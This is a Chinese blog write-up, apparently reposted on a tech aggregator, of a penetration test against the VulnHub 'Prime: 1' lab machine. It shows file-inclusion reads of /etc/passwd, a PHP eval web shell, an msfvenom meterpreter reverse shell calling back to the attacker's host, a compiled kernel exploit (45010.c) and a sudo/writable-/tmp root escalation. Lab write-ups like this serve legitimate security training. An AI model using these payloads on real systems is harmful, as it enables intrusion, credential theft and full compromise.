IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> prime_series_level_1渗透测试 -> 正文阅读

[PHP知识库]prime_series_level_1渗透测试

环境搭建

官网https://www.vulnhub.com/entry/prime-1,358/
将VMX文件(VMWare 文件格式详解 .VMX .VMSD .VMDK)直接拖进来

在这里插入图片描述

思路

扫描网站路径与敏感文件,通过不断的提示找到一个可用的fuzz工具。利用fuzzing爆破参数发现了可利用进行文件包含的参数file,这里再得到提示后,在仅有的一个php文件中利用secrettier360参数fuzzing系统敏感文件,找到一个密码后在wordpress页面进行登录,找到一个可以写入内容的页面,写入一句话木马并getshell,最后利用已存在的一个漏洞或是利用后门密码进行提权

渗透测试

sudo arp-scan -l 
nmap -sV 192.168.22.130

在这里插入图片描述
访问80端口,没有任何信息
在这里插入图片描述
拿dirsearch直接扫

./dirsearch.py -u 192.168.22.130 -e*

在这里插入图片描述
访问dev目录,有提示但是又好像没有什么用
在这里插入图片描述
中间的几个页面访问到都没有什么用,再访问/wordpress/,一个新建的wordpress页面
在这里插入图片描述

再拿御剑扫一扫,发现了一个secret.txt,访问又发现一个提示
在这里插入图片描述

在这里插入图片描述
Fuzz_For_Web

看来是得用给出的工具去搞location.txt,这个工具简单来说就是用爆破的方式来模糊测试?后参数是什么,这里具体如何使用网址中也讲的很详细

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hl 7 http://192.168.22.130/index.php?FUZZ=location.txt

这里–hl 7就是对Lines进行的限制,因为发现有一个8L的数据,所以将大量7l的限制后,就能得到特殊的一个参数file

在这里插入图片描述
在这里插入图片描述

直接访问/index.php?file=location.txt
在这里插入图片描述

use ‘secrettier360’ parameter on some other php page for more fun.

刚才只扫到一个index.php和一个image.php所以这里只能利用image.php

在这里插入图片描述

这里尝试进行任意文件读取

/image.php?secrettier360=/etc/passwd

在这里插入图片描述

在/etc/passwd中发现find password.txt file in my directory:/home/saket,访问

/image.php?secrettier360=/home/saket/password.txt

在这里插入图片描述

得到一个密码(follow_the_ippsec),本想着在虚拟机上直接登录
在这里插入图片描述
在这里插入图片描述

又想起来刚刚有找到一个/wordpress/目录,既然是wordpress框架的话,尝试能不能直接找到它登陆的地方,这里也是有一个用户名
在这里插入图片描述

victor,follow_the_ippsec登录成功,这里找到theme editor的secret.php页面,发现可以进行文件上传,这里直接传一个php一句话木马

<?php @eval($_POST['qwer']);?>

在这里插入图片描述

搞过wordpress的应该可以找到上传路径在哪,不过这里能进行命令执行,但是不能用蚁剑进行连接

http://192.168.22.130/wordpress/wp-content/themes/twentynineteen/secret.php

在这里插入图片描述

利用msfMsfvenom命令总结大全中已有payload(php/meterpreter/reverse_tcp)生成shell.php。打开shell.php文件,将内容复制到secret.php中。

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.22.128 lport=1234 -f raw -o /home/yster/桌面/shell.php
      -p选择相应payload
      lhost=本地IP
      lport=监听端口
      -f raw 指定输出格式。
      -o 指定输出文件的位置

在这里插入图片描述
在这里插入图片描述

将secret.php文件上传成功后,使用msf模块(exploit/multi/handler),设置lhost和lport和payload(php/meterpreter/reverse_tcp),开启监听后,浏览器打开secret.php页面。

msfconsole
use exploit/multi/handler
show options
set lhost 192.168.22.128
set payload php/meterpreter/reverse_tcp
set lport 1234
run
http://192.168.22.130/wordpress/wp-content/themes/twentynineteen/secret.php

在这里插入图片描述

通过会话拿到shell,再用python稳一下bash,这里已经拿到普通用户的权限了,接下来就是提权

python -c 'import pty;pty.spawn("/bin/bash")'
msf直接进行提权(失败)

参考渗透测试实战——prime靶机入侵时,是通过查看版本内核后发现可以利用msf直接拿下,但我在利用时候最后一步出了点问题
在这里插入图片描述
再打开kali的msf,利用LinuxKernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local PrivilegeEscalation进行提权
在这里插入图片描述

先把45010.c丢到一个好找的地方,对它进行编译,随后在meterpreter中进行上传,最后拿用户权限进行执行

 cp /usr/share/exploitdb/exploits/linux/local/45010.c  /home/yster/
 gcc 45010.c -o root
 
 upload /home/yster/root /tmp

 ./root

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

利用可任意调用文件的可执行文件

【writeup】Prime_Series_level_1靶机。查了好多文章,仿佛只有这一篇有写如何提权

在/opt下有一个backup_pass文件,存有enc文件密码(backup_password"),在home目录下查找enc文件
在这里插入图片描述
在这里插入图片描述
直接执行时需要密码,输入backup_password
在这里插入图片描述
看提示应该是从/root复制文件到当前路径。所以使用sudo执行。
在这里插入图片描述
但是好像并没有什么东西,cat一下enc与key
在这里插入图片描述enc.txt文件是一窜加密的文本。key.txt内容是提示如何解密enc.txt的加密文本(应该是先把ippsec进行md5加密,加密后的值用于解密enc.txt)。这里用到的网站:
https://www.cmd5.com/
https://www.devglan.com/online-tools/aes-encryption-decryption
https://base64.us/
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

ipsec md5加密后的值为:366a74cb3c959de17d61db30591c39d1
enc解密后内容:Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,

根据解密后的内容,获得了saket密码。从www-data用户切换到saket用户。
切换到saket用户后,查看下saket用户的权限。

su saket   //tribute_to_ippsec
sudo -l

在这里插入图片描述
可以看到saket用户可以不输入密码执行/home/victor/undefeated_victor(这个跟sudoers文件有关),直接执行

sudo /home/victor/undefeated_victor

if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found

/tmp/challenge: not found,这里因为saket用户可以不输入密码执行/home/victor/undefeated_victor文件,而undefeated_victor文件会执行/tmp/challenge下的命令,因为该路径是空的所以会报错not found,但是/tmp是可写入的,所以将/bin/bash复制到/tmp/challenge,然后再次执行,就能获取root权限,整体就是saket用户->undefeated_victor->/tmp/challenge->/bin/bash

cp /bin/bash /tmp/challenge
sudo /home/victor/undefeated_victor

if you can defeat me then challenge me in front of you

在这里插入图片描述

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2021-11-24 07:45:09  更:2021-11-24 07:45:32 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/14 14:26:29-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码